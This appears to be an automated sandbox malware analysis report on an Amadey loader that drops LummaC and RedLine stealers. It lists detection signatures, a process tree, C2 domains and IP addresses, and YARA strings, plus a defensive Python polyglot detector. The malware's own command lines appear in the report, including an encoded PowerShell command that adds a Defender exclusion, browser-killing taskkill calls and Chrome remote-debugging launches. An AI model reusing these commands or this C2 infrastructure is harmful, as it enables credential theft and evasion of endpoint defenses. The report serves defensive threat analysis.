
Windows Analysis Report
cMTqzvmx9u.exe

Overview

General Information

Sample name: cMTqzvmx9u.exe (renamed because the original name is a hash value)
Original sample name: 0a8673bbea31ae21e9e87be408752436.exe
Analysis ID: 1580355
MD5: 0a8673bbea31ae21e9e87be408752436
SHA1: a8c29df353c7af7928ce3e24a9f606f0787109ac
SHA256: e2ae261a55bc83c0e3c9ab657a16d2c76a329b6a4ff40370119e079f2631b69c
Tags: Amadey, exe, user-abuse_ch

Detection

Malware families: LummaC, Amadey, LummaC Stealer, RedLine
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Yara detected Amadeys stealer DLL
Yara detected LummaC Stealer
Yara detected RedLine Stealer
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation))
Creates files in the system32 config directory
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Encrypted powershell cmdline option found
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign process
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Suspicious powershell command line found
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates COM task schedule object (often to register a task for autostart)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Deletes files inside the Windows folder
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
One or more processes crash
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Suspicious Execution of Powershell with Base64
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • cMTqzvmx9u.exe (PID: 2056 cmdline: "C:\Users\user\Desktop\cMTqzvmx9u.exe" MD5: 0A8673BBEA31AE21E9E87BE408752436)
    • skotes.exe (PID: 3648 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: 0A8673BBEA31AE21E9E87BE408752436)
  • skotes.exe (PID: 6680 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 0A8673BBEA31AE21E9E87BE408752436)
  • skotes.exe (PID: 828 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: 0A8673BBEA31AE21E9E87BE408752436)
    • 7620ab885d.exe (PID: 2456 cmdline: "C:\Users\user\AppData\Local\Temp\1021693001\7620ab885d.exe" MD5: 1C22D90D4F3C0BE6834E0777C7B4D18A)
      • WerFault.exe (PID: 3780 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 1980 MD5: C31336C1EFC2CCB44B4326EA793040F2)
    • 8469cb4d4d.exe (PID: 7060 cmdline: "C:\Users\user\AppData\Local\Temp\1021707001\8469cb4d4d.exe" MD5: 15709EBA2AFAF7CC0A86CE0ABF8E53F1)
    • 0a7e8af92e.exe (PID: 632 cmdline: "C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe" MD5: 75CA34215F6E3916C51C0AF34FC17284)
      • powershell.exe (PID: 6216 cmdline: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA= MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 1384 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • WmiPrvSE.exe (PID: 4536 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
      • DJj.exe (PID: 3500 cmdline: "C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe" MD5: 95B7A7CBC0AFF0215004C5A56EA5952C)
    • ba944ca4ff.exe (PID: 820 cmdline: "C:\Users\user\AppData\Local\Temp\1021709001\ba944ca4ff.exe" MD5: 87330F1877C33A5A6203C49075223B16)
    • 7ddd2a748c.exe (PID: 6504 cmdline: "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe" MD5: 9AB250B0DC1D156E2D123D277EB4D132)
      • conhost.exe (PID: 416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 7ddd2a748c.exe (PID: 3848 cmdline: "C:\Users\user\AppData\Local\Temp\1021710001\7ddd2a748c.exe" MD5: 9AB250B0DC1D156E2D123D277EB4D132)
    • 68f6adf5d5.exe (PID: 7156 cmdline: "C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe" MD5: 3567CB15156760B2F111512FFDBC1451)
      • graph.exe (PID: 3184 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
    • b285303eae.exe (PID: 7044 cmdline: "C:\Users\user\AppData\Local\Temp\1021712001\b285303eae.exe" MD5: 8A0FEB447F024F32D1EE001A56D7EE23)
    • b9ba85c997.exe (PID: 4164 cmdline: "C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe" MD5: CA7C431ABAC02CFB1B6B43ED9B3457E3)
    • e6e4c20fad.exe (PID: 6848 cmdline: "C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe" MD5: 7684D60F9F9760FB4AC16A2FA7F5EEDA)
      • chrome.exe (PID: 764 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 4580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2324 --field-trial-handle=2068,i,843618081044159646,7048051155427762335,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • fb584dabd7.exe (PID: 7088 cmdline: "C:\Users\user\AppData\Local\Temp\1021715001\fb584dabd7.exe" MD5: 3F47413343D51345115E32189E96C142)
      • taskkill.exe (PID: 3836 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 5708 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6808 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 4232 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 1588 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 6700 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6716 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 4808 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 6132 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 4144 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • firefox.exe (PID: 3748 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • 96e283ac77.exe (PID: 1728 cmdline: "C:\Users\user\AppData\Local\Temp\1021716001\96e283ac77.exe" MD5: A55D697A530E905F6C6539469BA973BD)
  • 68f6adf5d5.exe (PID: 5592 cmdline: C:\Users\user\AppData\Local\Temp\1021711001\68f6adf5d5.exe MD5: 3567CB15156760B2F111512FFDBC1451)
  • graph.exe (PID: 5536 cmdline: "C:\Program Files\Windows Media Player\graph\graph.exe" MD5: 7D254439AF7B1CAAA765420BEA7FBD3F)
  • svchost.exe (PID: 6892 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • firefox.exe (PID: 5264 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
    • firefox.exe (PID: 2752 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • firefox.exe (PID: 6808 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2280 -parentBuildID 20230927232528 -prefsHandle 2200 -prefMapHandle 2192 -prefsLen 25298 -prefMapSize 238442 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {c580837b-9763-4e9e-ad1e-338f434464c7} 2752 "\\.\pipe\gecko-crash-server-pipe.2752" 20ea916db10 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
Name: Lumma Stealer, LummaC2 Stealer
Description: Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5". The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Name: Amadey
Description: Amadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.amadey

Name: RedLine Stealer
Description: RedLine Stealer is a malware available on underground forums for sale apparently as a standalone ($100/$150 depending on the version) or also on a subscription basis ($100/month). This malware harvests information from browsers such as saved credentials, autocomplete data, and credit card information. A system inventory is also taken when running on a target machine, to include details such as the username, location data, hardware configuration, and information regarding installed security software. More recent versions of RedLine added the ability to steal cryptocurrency. FTP and IM clients are also apparently targeted by this family, and this malware has the ability to upload and download files, execute commands, and periodically send back information about the infected computer.
Attribution: No Attribution
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.redline_stealer
Extracted malware configuration (LummaC): {"C2 url": ["pancakedipyps.click", "tentabatte.lat", "talkynicer.lat", "slipperyloo.lat", "bashfulacid.lat", "manyrestro.lat", "shapestickyr.lat", "wordyfindy.lat", "curverpluch.lat"], "Build id": "FATE99--test"}
Extracted malware configuration (Amadey): {"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
Extracted malware configuration (RedLine): {"C2 url": "147.45.44.224:1912", "Bot Id": "1488Traffer", "Authorization Header": "c74790bd166600f1f665c8ce201776eb"}
Source | Rule | Description | Author | Strings
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png | INDICATOR_SUSPICIOUS_IMG_Embedded_Archive | Detects images embedding archives. Observed in TheRat RAT. | ditekSHen
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Program Files\Windows Media Player\1w4lv5IzuEVOMa3sjCc6orj2dWPvJoK5f | INDICATOR_SUSPICIOUS_IMG_Embedded_Archive | Detects images embedding archives. Observed in TheRat RAT. | ditekSHen
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
C:\Users\user\AppData\Roaming\r3yhfqlfwevGCAOVPFS\DJj.exe | infostealer_win_redline_strings | Finds Redline samples based on characteristic strings | Sekoia.io
  • 0x24cc3:$gen01: ChromeGetRoamingName
  • 0x24ce8:$gen02: ChromeGetLocalName
  • 0x24d2b:$gen03: get_UserDomainName
  • 0x28bc4:$gen04: get_encrypted_key
  • 0x27943:$gen05: browserPaths
  • 0x27c19:$gen06: GetBrowsers
  • 0x27501:$gen07: get_InstalledInputLanguages
  • 0x239cc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
  • 0x3018:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
  • 0x29006:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole
  • 0x290a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\
  • 0x2972a:$spe9: *wallet*
  • 0x219ea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
  • 0x21f14:$typ03: A937C899247696B6565665BE3BD09607F49A2042
  • 0x21fc1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
  • 0x21998:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
  • 0x219c1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
  • 0x21b92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
  • 0x21de5:$typ11: 2A19BFD7333718195216588A698752C517111B02
  • 0x220d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\output[1].png | INDICATOR_SUSPICIOUS_IMG_Embedded_Archive | Detects images embedding archives. Observed in TheRat RAT. | ditekSHen
  • 0x82f3:$zipwopass: 50 4B 03 04 14 00 00 00
Source | Rule | Description | Author | Strings
0000000B.00000002.2343778793.000001C13114E000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000001B.00000003.2816284787.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000001B.00000002.2825365325.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0000000B.00000002.2343778793.000001C1310D6000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
0000001B.00000003.2788989135.0000000000CB6000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Additional entries omitted (29 in the full report).
Source | Rule | Description | Author | Strings
11.2.0a7e8af92e.exe.1c130c124d0.0.raw.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
11.2.0a7e8af92e.exe.1c1310fe590.3.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
11.2.0a7e8af92e.exe.1c1310fe590.3.unpack | infostealer_win_redline_strings | Finds Redline samples based on characteristic strings | Sekoia.io
  • 0x22ec3:$gen01: ChromeGetRoamingName
  • 0x22ee8:$gen02: ChromeGetLocalName
  • 0x22f2b:$gen03: get_UserDomainName
  • 0x26dc4:$gen04: get_encrypted_key
  • 0x25b43:$gen05: browserPaths
  • 0x25e19:$gen06: GetBrowsers
  • 0x25701:$gen07: get_InstalledInputLanguages
  • 0x21bcc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
  • 0x1218:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
  • 0x27206:$spe7: OFileInfopeFileInfora GFileInfoX StabFileInfole
  • 0x272a4:$spe8: ApGenericpDaGenericta\RGenericoamiGenericng\
  • 0x2792a:$spe9: *wallet*
  • 0x1fbea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
  • 0x20114:$typ03: A937C899247696B6565665BE3BD09607F49A2042
  • 0x201c1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
  • 0x1fb98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
  • 0x1fbc1:$typ08: A8F9B62160DF085B926D5ED70E2B0F6C95A25280
  • 0x1fd92:$typ10: 2FBDC611D3D91C142C969071EA8A7D3D10FF6301
  • 0x1ffe5:$typ11: 2A19BFD7333718195216588A698752C517111B02
  • 0x202d4:$typ13: 04EC68A0FC7D9B6A255684F330C28A4DCAB91F13
11.2.0a7e8af92e.exe.1c1310d6568.2.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security
11.2.0a7e8af92e.exe.1c1310d6568.2.unpack | infostealer_win_redline_strings | Finds Redline samples based on characteristic strings | Sekoia.io
  • 0x22ec3:$gen01: ChromeGetRoamingName
  • 0x492eb:$gen01: ChromeGetRoamingName
  • 0x22ee8:$gen02: ChromeGetLocalName
  • 0x49310:$gen02: ChromeGetLocalName
  • 0x22f2b:$gen03: get_UserDomainName
  • 0x49353:$gen03: get_UserDomainName
  • 0x25b43:$gen05: browserPaths
  • 0x25e19:$gen06: GetBrowsers
  • 0x25701:$gen07: get_InstalledInputLanguages
  • 0x21bcc:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
  • 0x47ff4:$gen08: BCRYPT_INIT_AUTH_MODE_INFO_VERSION
  • 0x1218:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
  • 0x29240:$spe1: [AString-ZaString-z\d]{2String4}\.[String\w-]{String6}\.[\wString-]{2String7}
  • 0x1fbea:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
  • 0x46012:$typ02: F413CEA9BAA458730567FE47F57CC3C94DDF63C0
  • 0x20114:$typ03: A937C899247696B6565665BE3BD09607F49A2042
  • 0x4653c:$typ03: A937C899247696B6565665BE3BD09607F49A2042
  • 0x201c1:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
  • 0x465e9:$typ04: D67333042BFFC20116BF01BC556566EC76C6F7E2
  • 0x1fb98:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
  • 0x45fc0:$typ07: 77A9683FAF2EC9EC3DABC09D33C3BD04E8897D60
Additional entries omitted (13 in the full report).
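The three INDICATOR_SUSPICIOUS_IMG_Embedded_Archive hits above all fire on the same string at the same offset (0x82f3): a ZIP local-file header with "version needed" 2.0 and a zero flags word (no encryption), inside files the loader fetched under the name output[1].png. That is the image/archive polyglot pattern: a PNG that viewers render normally, with an archive appended after the IEND chunk for the malware to carve out. The Python below is an added example written for this page, not code from Joe Sandbox or from the rule's author. It builds a constructed polyglot (a 1x1 PNG followed by a ZIP holding a dummy payload.exe), walks the PNG chunk table to the end of IEND, and reports the appended archive, including whether its first eight bytes are the ones the $zipwopass string keys on. Whether the real output[1].png files carry the archive after IEND or somewhere inside the image data is not shown in the report; the offset alone does not tell.

```python
import io
import struct
import zipfile
import zlib
from typing import Optional

PNG_SIG = b"\x89PNG\r\n\x1a\n"
ZIP_LOCAL_HEADER = b"PK\x03\x04"
# The exact 8 bytes the $zipwopass string in the YARA rule above looks for:
# local-file-header magic, "version needed" 2.0, general-purpose flags 0 (no encryption).
ZIPWOPASS = b"PK\x03\x04\x14\x00\x00\x00"


def _chunk(ctype: bytes, body: bytes) -> bytes:
    """Encode one PNG chunk: length, type, data, CRC32 over type + data."""
    return struct.pack(">I", len(body)) + ctype + body + struct.pack(">I", zlib.crc32(ctype + body))


def build_png_1x1() -> bytes:
    """A minimal valid 1x1 RGB PNG (constructed stand-in for output[1].png)."""
    ihdr = struct.pack(">IIBBBBB", 1, 1, 8, 2, 0, 0, 0)  # 1x1, 8-bit, colour type 2 (RGB)
    idat = zlib.compress(b"\x00" + b"\x00\x00\x00")       # filter byte + one black pixel
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", idat) + _chunk(b"IEND", b"")


def build_polyglot(entry_name: str = "payload.exe", payload: bytes = b"MZ" + b"\x00" * 62) -> bytes:
    """Constructed sample: the PNG above with a ZIP archive appended after IEND.

    The entry name and the 64-byte dummy payload are placeholders, not the real dropper."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry_name, payload)
    return build_png_1x1() + buf.getvalue()


def png_end_offset(data: bytes) -> Optional[int]:
    """Walk the chunk table and return the offset just past IEND, or None if not a PNG."""
    if not data.startswith(PNG_SIG):
        return None
    pos = len(PNG_SIG)
    while pos + 8 <= len(data):
        length, ctype = struct.unpack(">I4s", data[pos:pos + 8])
        pos += 8 + length + 4  # header + data + CRC
        if ctype == b"IEND":
            return pos if pos <= len(data) else None
    return None


def find_embedded_zip(data: bytes) -> Optional[dict]:
    """Report a ZIP local-file header that sits after the PNG's IEND chunk.

    Scanning only the trailer (rather than the whole file, as the YARA rule does)
    avoids false positives on compressed IDAT bytes that happen to contain PK 03 04.
    """
    end = png_end_offset(data)
    if end is None:
        return None
    off = data.find(ZIP_LOCAL_HEADER, end)
    if off < 0 or off + 30 > len(data):
        return None
    # Local file header: sig, version, flags, method, mtime, mdate, crc, csize, usize, nlen, xlen
    (_, _, flags, method, _, _, _, csize, usize, nlen, _) = struct.unpack("<4sHHHHHIIIHH", data[off:off + 30])
    name = data[off + 30:off + 30 + nlen].decode("utf-8", "replace")
    return {
        "zip_offset": off,
        "trailing_bytes": len(data) - end,
        "first_entry": name,
        "compression_method": method,          # 8 = deflate, 0 = stored
        "compressed_size": csize,
        "uncompressed_size": usize,
        "encrypted": bool(flags & 0x1),
        "complete": b"PK\x05\x06" in data[off:],              # end-of-central-directory present
        "matches_zipwopass": data[off:off + 8] == ZIPWOPASS,  # same bytes the YARA rule keys on
    }


if __name__ == "__main__":
    print(find_embedded_zip(build_polyglot()))
    print(find_embedded_zip(build_png_1x1()))  # clean image: None
```

Run it on a real sample with find_embedded_zip(open(path, "rb").read()); a non-None result with complete set is an archive worth extracting, while a hit with encrypted set is the case the $zipwopass string deliberately leaves out.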

System Summary

Source: Registry Key set | Author: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing | Data: Details: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9ba85c997.exe
Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, CommandLine: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, CommandLine|base64offset|contains: hv)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1021708001\0a7e8af92e.exe, ParentProcessId: 632, ParentProcessName: 0a7e8af92e.exe, ProcessCommandLine: "powershell.exe" -WindowStyle Hidden -EncodedCommand QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACcAQwA6AFwAVQBzAGUAcgBzAFwAaAB1AGIAZQByAHQAXABBAHAAcABEAGEAdABhAFwAUgBvAGEAbQBpAG4AZwBcAHIAMwB5AGgAZgBxAGwAZgB3AGUAdgBHAEMAQQBPAFYAUABGAFMAJwA=, ProcessId: 6216, ProcessName: powershell.exe
Source: Process started | Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1021714001\e6e4c20fad.exe, ParentProcessId: 6848, ParentProcessName: e6e4c20fad.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="", ProcessId: 764, ProcessName: chrome.exe
Source: Registry Key set | Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split) | Data: Details: C:\Users\user\AppData\Local\Temp\1021713001\b9ba85c997.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 828, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\b9ba85c997.exe
